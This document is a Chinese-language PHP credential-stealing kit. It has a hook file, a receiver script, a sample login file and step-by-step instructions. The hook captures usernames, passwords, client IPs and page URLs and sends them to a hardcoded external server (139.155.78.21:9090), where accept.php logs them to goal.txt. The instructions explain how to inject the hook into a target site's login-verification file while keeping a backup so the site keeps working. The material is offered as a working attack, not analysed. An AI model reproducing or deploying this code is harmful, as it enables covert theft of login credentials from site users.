0x01[Hook.php]

<?php
//获取用户名
function getuser($userget){
    global $usersend;
    $usersend = $userget;
}


//获取密码
function getpass($passget){
    global $passsend;
    $passsend = $passget;
}


//获取参考IP
function get_client_ip() {
    $ip = $_SERVER['REMOTE_ADDR'];
    if (isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) {
        foreach ($matches[0] AS $xip) {
            if (!preg_match('#^(10|172\.16|192\.168)\.#', $xip)) {
                $ip = $xip;
                break;
            }
        }
    }
    return $ip;
}


//获取当前页面URL
function getpage(){
    $pageget = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
    return $pageget;
}


//Mainsend
function Mainsend(){
    global $usersend;
    global $passsend;
    $ipipsend = get_client_ip();
    $pagesend = getpage();
    //这里输入接收文件地址,例如
    $hooksend = 'http://139.155.78.21:9090/accept.php?pass='.$passsend.'&user='.$usersend.'&ip='.$ipipsend.'&page='.$pagesend;
    $send = file_get_contents($hooksend);
}
?>

0x02[accept.php]

<?php
    ini_set('date.timezone','Asia/Shanghai');
    $password = $_GET['pass'];
    $username = $_GET['user'];
    $ip = $_GET['ip'];
    $page = $_GET['page'];
    $timenow = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']);
    $txt = '用户名:'.$username.'   密码:'.$password.'    参考IP:'.$ip.'    页面地址:'.$page.'    登录时间:'.$timenow."\n\t";
    $file = fopen('goal.txt','a');
    fwrite($file,$txt);
    fclose($file);
?>

0x03[Login.php]

//示例:
<?php
    include('Hook.php');
    $pa = $_GET['pass'];
    $us = $_GET['user'];
    getpass($pa);
    getuser($us);
    Mainsend();
?>

0x04[使用方法]

  • 在登录验证文件的目录下将0x01的Hook.php上传一份
  • 在自己服务器上将0x02的accept.php上传一份
  • 将Hook.php中的 $hooksend 改成自己的accept.php文件的地址,例如
$hooksend = 'http://139.155.78.21:9090/accept.php?pass='.$passsend.'&user='.$usersend.'&ip='.$ipipsend.'&page='.$pagesend;
  • 注意只更改 'http://xxx/accept.php?' 这一部分 其余无需更改
  • 将 目标网页的登录验证php文件 备份,这步不可忽略
  • 在目标网页的登录验证php文件中前几行随便找个位置加上一句 include('Hook.php');
  • 注意 Hook.php 要与 网页的登录验证php文件 在同一个目录下
  • 在目标网页的登录验证php文件中找到 用户名 和 密码 的变量,类似于0x03[Login.php]中的$pa 与 $us
  • 将 用户名变量 用 getuser() 包裹住,将 密码变量 用 getpass() 包裹住
  • 紧接着下一行写入 Mainsend();
  • 当登录时,会在自己服务器同accept.php目录下生成名为 goal.txt 的接收文件
  • goal.txt中能收到 用户名 密码 参考IP 登录页面 登录时间
  • 如果按照以上操作后无法登录或者接受不到,请检查是否有语法错误或者其他原因
  • 原网页若无法登录请立即利用备份文件恢复至更改前